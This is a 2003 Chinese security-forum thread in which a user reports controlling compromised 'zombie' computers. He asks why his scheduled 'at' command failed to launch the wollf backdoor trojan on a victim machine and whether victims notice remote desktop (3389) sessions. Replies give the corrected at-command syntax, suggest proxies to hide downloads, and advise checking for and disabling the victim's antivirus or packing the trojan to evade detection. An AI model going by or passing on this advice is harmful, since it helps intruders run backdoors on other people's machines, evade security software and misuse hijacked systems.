|
 | 作者: wert [wert]
 论坛用户 |
登录 |
| 问一: 用net time得知为: \\肉鸡 的当前时间是 2003/7/8 下午 02:45 再用: at \\2**.213.234.5 02:47 wollf.exe 新加了一项作业,其作业 ID = 3 ----------------------------------- 过了几分钟,木马仍为起动,WHY? 后来我再用AT查了一下,信息如下: C:\>at \\2**.**.201.115 状态 ID 日期 时间 命令行 ----------------------------------------------------------------- 1 明天 上午 01:45 wollf.exe 2 明天 上午 01:53 wollf.exe 3 明天 上午 01:53 wollf.exe 提示是明天?难道AT用错了吗?,为什么不按设置的时间运行 问二: 用终端上3389后,如果肉鸡有上在,他会发现吗?还是在后台运行的,请告知! |
| 地主 发表时间: 07/08 15:01 |
 | 回复: liyuanzao [liyuanzao] 论坛用户 |
登录 |
|
我知道3389在后台运行 如果对方也在使用电脑,可以发现。但不是一定发现 |
| B1层 发表时间: 07/08 15:37 |
 | 回复: aney [aney]  论坛用户 |
登录 |
|
好像要说明wolfe。exe那文件在那个目录下巴! |
| B2层 发表时间: 07/08 15:59 |
| 回复: wert [wert] 论坛用户 |
登录 |
|
不是了,因为我得到2台电信100M的肉鸡 想用3389做个下载的跳板 就是怕在那边DOWN的时候被发现咯 @_@ |
| B3层 发表时间: 07/08 16:08 |
| 回复: aney [aney] 论坛用户 |
登录 |
|
下载东西用什么代理!!或者用pgp加密! |
| B4层 发表时间: 07/08 19:14 |
 | 回复: BearKing [bking]  版主 |
登录 |
|
用24小时制 14:45 |
| B5层 发表时间: 07/08 20:26 |
 | 回复: NetDemon [netdemon]  ADMIN |
登录 |
|
\\肉鸡 的当前时间是 2003/7/8 下午 02:45 1 明天 上午 01:45 wollf.exe 你难道还不可以看出问题所在么? |
| B6层 发表时间: 07/09 02:20 |
 | 回复: mhhacker [mhhacker] 论坛用户 |
登录 |
|
用at命令不论对方是12小时制还是24小时制 在命令上都应该用24制 比如: at \\2**.213.234.5 14:47 wollf.exe |
| B7层 发表时间: 07/13 18:19 |
| 回复: usrvp [usrvp] 论坛用户 |
登录 |
|
楼上各位也不完全对,如果是出现这种问题的话,有两种可能性比较大,一种就是楼上几位所说的,时间问题,在这里也可以不用24小时制,可以在小时后面加上am或pm,这样就会很明显的区分上午或者是下午。第二种可能,也是可能性最大的一种就是对方开有病毒防火墙,因为像wollf这样经典的后门工具,各大杀毒软件一般都不会放过的,他们就指着这个吃饭啊(哇噻,谁扔鸡蛋啊?)。所以最好先用远程进程查看器查看一下对方是否真开有防火墙,如果是的话,就给它关闭(当然你要有相应的权限,也是就administrator权限,既然能at了,我相信你一定会具有administrator权限了)或给wollf加壳(这样的问题还要我说吗?)。 |
| B8层 发表时间: 07/14 04:32 |
 | 回复: jeerie [jeerie] 论坛用户 |
登录 |
|
不管用什么制也都该是2:45不会变成1:45呀,差一个小时哪去了。 |
| B9层 发表时间: 07/14 08:22 |
 | 回复: a_huiid [a_huiid] 论坛用户 |
登录 |
|
请楼上的大哥(NetDemon) 能不能解释一下为什么2:45变成1:45啊?谢谢啦哈~!! |
| B10层 发表时间: 07/18 23:28 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 关于AT命令及3389的应用问题,有请点拨!